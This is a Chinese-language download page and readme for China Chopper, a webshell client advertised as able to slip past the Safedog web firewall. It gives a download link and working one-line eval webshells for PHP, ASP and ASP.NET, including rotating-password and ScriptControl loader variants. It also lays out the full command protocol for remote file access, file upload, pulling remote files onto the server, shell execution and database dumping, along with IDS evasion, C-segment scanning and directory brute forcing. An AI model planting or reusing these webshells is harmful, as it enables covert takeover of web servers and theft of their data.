最新過狗菜刀下載
下載請認準官方網站:http://www.maicaidao.com/
不過現在官方已經打不開了,很多朋友找不到下載地址,所以現在放出來,有需要的朋友可以自行下載!
下載地址:https://www.lanzous.com/i1xg3gj
軟件簡介:
軟件名稱:中國菜刀(China chopper)
官方網站:http://www.maicaidao.com/
———————————————————————————————————-
免責申明:
請使用者註意使用環境並遵守國家相關法律法規!
由於使用不當造成的後果本廠家不承擔任何責任!
———————————————————————————————————-
程序在使用過程中難免有各種BUG,到官網看一下是否有更新吧,說不定己經修補了呢。
———————————————————————————————————-
UINCODE方式編譯,支持多國語言輸入顯示。
在非簡體中文環境下使用,自動更換成英文界面,翻譯有誤的地方請留言指正。
一、腳本客戶端(包括但不限於EVAL)部分
1)基本信息
Eval服務端只需要簡單的一行代碼,即可用此程序實現常用的管理功能,功能代碼二次編碼後發送,過IDS的能力大幅提高。
目前支持的服務端腳本:PHP, ASP, ASP.NET,並且支持https安全連接的網站。
在服務端運行的代碼如下:
PHP: <?php @eval($_POST[‘chopper’]);?>
ASP: <%eval request(“chopper”)%>
ASP.NET: <%@ Page Language=”Jscript”%><%eval(Request.Item[“chopper”],”unsafe”);%>
(註意: ASP.NET要單獨一個文件或此文件也是Jscript腳本)
Customize: 自定義類型,功能代碼在服務端保存,理論上支持所有動態腳本,只要正確與菜刀進行交互即可。
此模式可按需定制,比如只要瀏覽目錄,或是只要虛擬終端功能,代碼可以很簡短。
隨日期變化的連接密碼, 服務端寫法:
Asp.NET:
<%@ Page Language=”Jscript”%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format(“{0:yyyyMMdd}”,DateTime.Now.ToUniversalTime())+”37E4DD20C310142564FC483DB1132F36″, “MD5″).ToUpper()],”unsafe”);%>
PHP:
@eval($_POST[strtoupper(md5(gmdate(“Ymd”).”37E4DD20C310142564FC483DB1132F36″))]);
例如:菜刀的密碼為chopper,在前面加三個字符,新密碼為:{D}chopper
2)幾大功能
在主視圖中右鍵/添加,在彈出的對話框中輸入服務端地址,連接的密碼(請註意上例中的pass字串),選擇正確的腳本類型和語言編碼,
保存後即可使用文件管理,虛擬終端,數據庫管理,自寫腳本幾大塊功能。
1. 文件管理:[特色]緩存下載目錄,並支持離線查看緩存目錄;
2. 虛擬終端:[特色]人性化的設計,操作方便;(輸入HELP查看更多用法), 超長命令會分割為5k字節一份,分別提交。
3. 數據庫管理:[特色]圖形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, 以及支持ADO方式連接的數據庫。
如果精通SQL語法,何必還要PHPMYADMIN呢?而且,菜刀還支持任何腳本的數據庫管理呢。
(各種腳本條件下的數據庫連接方法請點擊數據庫管理界面左上角處的配置按鈕查看)
4. 自寫腳本:通過簡單編碼後提交用戶自己的腳本到服務端執行,實現豐富的功能,也可選擇發送到瀏覽器執行。
如果要寫自己的CCC腳本,可以參考一下CCC目錄下的示例代碼, 相信你也可以寫出功能豐富的腳本。
可以在官網下載別人的CCC腳本,或分享你的得意之作。
註意:由於服務器的安全設置,某些功能可能不能正常使用。
3) 配置信息填寫說明
—————————————————————————————
A) 數據庫方面:
—————————————————————————–
PHP腳本:
<T>類型</T> 類型可為MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL中的一種
<H>主機地址<H> 主機地址可為機器名或IP地址,如localhost
<U>數據庫用戶</U> 連接數據庫的用戶名,如root
<P>數據庫密碼</P> 連接數據庫的密碼,如123455
<N>默認庫</N> 默認連接的庫名
<L>utf8</L> 這一項數據庫類型為MYSQL腳本為PHP時可選,不填則為latin1
ASP和ASP.NET腳本:
<T>類型</T> 類型只能填ADO
<C>ADO配置信息</C>
ADO連接各種數據庫的方式不一樣。如MSSQL的配置信息為
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456;
同時,支持NT驗證登錄MSSQL數據庫,並能把查詢的結果列表導出為html文件
Customize 腳本:
<T>類型</T> 類型只能填XDB
<X>與Customize 腳本約定的配置信息</X>
菜刀自帶的Customize.jsp數據庫參數填寫方法如下(兩行):
MSSQL:
<X>
com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456
</X>
MYSQL:
<X>
com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=123456
</X>
ORACLE:
<X>
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:user/[email protected]:1521/test
</X>
B) 其它方面:
—————————————————————————–
添加額外附加提交的數據,如ASP的新服務端是這樣的:
<%
Set o = Server.CreateObject(“ScriptControl”)
o.language = “vbscript”
o.addcode(Request(“SC”))
o.run “ff”,Server,Response,Request,Application,Session,Error
%>
那麽,菜刀在配置處填入:
<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request(“pass”)):end+function</O>
然後以密碼pass來連接即可。
提交功能前先POST額外的數據包:會話期間只提交一次。
<POST>https://maicaidao.com/cgi-bin/login.cgi</POST>
<DATA>uid=user1&pwd=123456</DATA>
默認終端程序路徑設置示例:
<SHELL>/bin/sh</SHELL>
虛擬終端默認命令設置示例:
<CMD>whoami</CMD>
文件管理默認打開的目錄設置示例:
<CD>c:\windows\temp\</CD>
3) HTTP登錄驗證
SHELL地址這樣填 http://user:[email protected]/server.asp
用戶名密碼中的特殊字符可用URL編碼轉換。
4) 數據導入:在SHELL列表界面,右鍵有一項菜單,可以把其它的菜刀庫導入到當前分類中。
二、安全掃描
蜘蛛爬行,綁定域名查詢,目錄爆破。
命令解釋:
A) 查單一IP的綁定域名
{reverse_ip} {url:http://www.maicaidao.com/}
B) 掃描本C段開放的WEB服務器,並查詢綁定域名
{reverse_ip_c} {url:http://www.maicaidao.com/}
C) 只掃描本C段開放的WEB服務器
{reverse_ip_c} {url:http://www.maicaidao.com/} {port}
D) 蜘蛛爬行
{spider} {url:http://www.maicaidao.com/}
E) 蜘蛛爬行,並設定爬行範圍
{spider} {url:http://www.maicaidao.com/} {range:maicaidao.com}
F) 蜘蛛爬行,過濾重復URL加快速度
加上 {filter}
G) 爆破功能,%s為dict中的一行
flag:後面為返回的數據(含HTTP頭部)中的特定關鍵字
加!!為不包含關鍵字為TRUE,否則包含關鍵字為TRUE
list.txt為當前目錄下的文件,可設為絕對路徑,註意:不要包含太多的行。
註:從20100626版開始,list.txt一定要是UNICODE格式的文本文件
{crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt}
{crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt}
{crack} {url:http://www.maicaidao.com/%s/} {flag:successfully} {dict:list.txt}
三、定時提醒
當鬧鐘來用吧, 周期:每月/每周/每日/只一次。
四、瀏覽器
就是一個專用的網頁瀏覽器:Post瀏覽/自定義Cookies,/執行自定義腳本/自動刷新頁面/同IP網頁搜索。
如果有ip.dat庫,在狀態欄會顯示此網站的IP,國家代碼。
五、其它部分
等待加入。
——————————————–
20110628版更新註意事項
緩存庫最好重建一下。
——————————————–
文件說明:
——————————————————————
chopper.exe 菜刀程序
db.mdb 菜刀的主數據庫
——————————————————————
cache.tmp 菜刀的緩存數據庫(可刪除)
readme.txt 你現在正在看的(可刪除)
<CCC> 菜刀的自寫腳本(可刪除)
<Customize> Customize模式的服務端(可刪除)
Customize.aspx 這是一個C#的示例服務端(全功能)
Customize.jsp 這是一個jsp的示例服務端(全功能)
Customize.cfm 這是一個cfm的示例服務端(文件管理,虛擬終端)
—-附—————————Customize模式菜刀和服務端通信接口—————————————————————–
———————————-其它語言的服務端代碼可按此接口來編寫(請參照Customize.jsp/Customize.cfm)———————
例:菜刀客戶端填寫的密碼為pass,網頁編碼選的是GB2312(Jsp服務端會用到此參數)
註:所有參數都以POST提交,返回的數據都要以->|為開始標記,|<-為結束標記
註:返回的錯誤信息開頭包含ERROR://
註:\t代表制表符TAB,\r\n代表換行回車,\n代表回車
註:數據庫配置信息是一個字符串,服務端腳本可以對此字符串格式進行自定義。
———————————————————————————————————————————–
[得到當前目錄的絕對路徑]
提交:pass=A&z0=GB2312
返回:目錄的絕對路徑\t,如果是Windows系統後面接著加上驅動器列表
示例:c:\inetpub\wwwroot\ C:D:E:K:
示例:/var/www/html/
[目錄瀏覽]
提交:pass=B&z0=GB2312&z1=目錄絕對路徑
返回:先目錄後文件,目錄名後要加/,文件名後不要加/
示例:
目錄名/\t時間\t大小\t屬性\n目錄名/\t時間\t大小\t屬性\n
文件名\t時間\t大小\t屬性\n文件名\t時間\t大小\t屬性\n
[讀取文本文件]
提交:pass=C&z0=GB2312&z1=文件絕對路徑
返回:文本文件的內容
[寫入文本文件]
提交:pass=D&z0=GB2312&z1=文件絕對路徑&z2=文件內容
返回:成功返回1,不成功返回錯誤信息
[刪除文件或目錄]
提交:pass=E&z0=GB2312&z1=文件或目錄的絕對路徑
返回:成功返回1,不成功返回錯誤信息
[下載文件]
提交:pass=F&z0=GB2312&z1=服務器文件的絕對路徑
返回:要下載文件的內容
[上傳文件]
提交:pass=G&z0=GB2312&z1=文件上傳後的絕對路徑&z2=文件內容(十六進制文本格式)
返回:要下載文件的內容
[復制文件或目錄後粘貼]
提交:pass=H&z0=GB2312&z1=復制的絕對路徑&z2=粘貼的絕對路徑
返回:成功返回1,不成功返回錯誤信息
[文件或目錄重命名]
提交:pass=I&z0=GB2312&z1=原名(絕對路徑)&z2=新名(絕對路徑)
返回:成功返回1,不成功返回錯誤信息
[新建目錄]
提交:pass=J&z0=GB2312&z1=新目錄名(絕對路徑)
返回:成功返回1,不成功返回錯誤信息
[修改文件或目錄時間]
提交:pass=K&z0=GB2312&z1=文件或目錄的絕對路徑&z2=時間(格式:yyyy-MM-dd HH:mm:ss)
返回:成功返回1,不成功返回錯誤信息
[下載文件到服務器]
提交:pass=L&z0=GB2312&z1=URL路徑&z2=下載後保存的絕對路徑
返回:成功返回1,不成功返回錯誤信息
[執行Shell命令(Shell路徑前會根據服務器系統類型加上-c或/c參數)]
提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路徑&z2=Shell命令
返回:命令執行結果
[得到數據庫基本信息]
提交:pass=N&z0=GB2312&z1=數據庫配置信息
返回:成功返回數據庫(以制表符\t分隔), 不成功返回錯誤信息
[獲取數據庫表名]
提交:pass=O&z0=GB2312&z1=數據庫配置信息\r\n數據庫名
返回:成功返回數據表(以\t分隔), 不成功返回錯誤信息
[獲取數據表列名]
提交:pass=P&z0=GB2312&z1=數據庫配置信息\r\n數據庫名\r\n數據表名
返回:成功返回數據列(以制表符\t分隔), 不成功返回錯誤信息
[執行數據庫命令]
提交:pass=Q&z0=GB2312&z1=數據庫配置信息\r\n數據庫名&z2=SQL命令
返回:成功返回數據表內容, 不成功返回錯誤信息
註意:返回的第一行為表頭,接下去每行分別在列表中顯示,列數要求一致。行中的每列後加上\t|\t標記,每行以標記\r\n為結束
========================
分享caidao,安全風險自控
最新過狗菜刀下載